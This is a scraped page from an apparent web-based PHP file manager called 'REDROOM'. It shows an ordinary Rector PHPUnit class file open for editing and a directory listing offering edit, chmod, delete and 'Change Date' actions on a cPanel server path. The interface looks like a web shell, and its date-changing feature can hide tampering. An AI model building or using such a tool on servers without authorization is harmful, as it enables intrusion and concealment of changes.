REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 1018 B
Close
//opt/cpanel/ea-wappspector/vendor/rector/rector/vendor/rector/rector-phpunit/src/ValueObject/AnnotationWithValueToAttribute.php
Text
Base64
<?php declare (strict_types=1); namespace Rector\PHPUnit\ValueObject; final class AnnotationWithValueToAttribute { /** * @readonly * @var string */ private $annotationName; /** * @readonly * @var string */ private $attributeClass; /** * @var array<mixed, mixed> * @readonly */ private $valueMap = []; /** * @param array<mixed, mixed> $valueMap */ public function __construct(string $annotationName, string $attributeClass, array $valueMap = []) { $this->annotationName = $annotationName; $this->attributeClass = $attributeClass; $this->valueMap = $valueMap; } public function getAnnotationName() : string { return $this->annotationName; } public function getAttributeClass() : string { return $this->attributeClass; } /** * @return array<mixed, mixed> */ public function getValueMap() : array { return $this->valueMap; } }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 4
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
AnnotationWithValueToAttribute.php
1018 B
lrw-r--r--
2024-11-08 13:59:10
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
BinaryOpWithAssertMethod.php
946 B
lrw-r--r--
2024-11-08 13:59:10
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
ConstantWithAssertMethods.php
917 B
lrw-r--r--
2024-11-08 13:59:10
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
FunctionNameWithAssertMethods.php
945 B
lrw-r--r--
2024-11-08 13:59:10
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).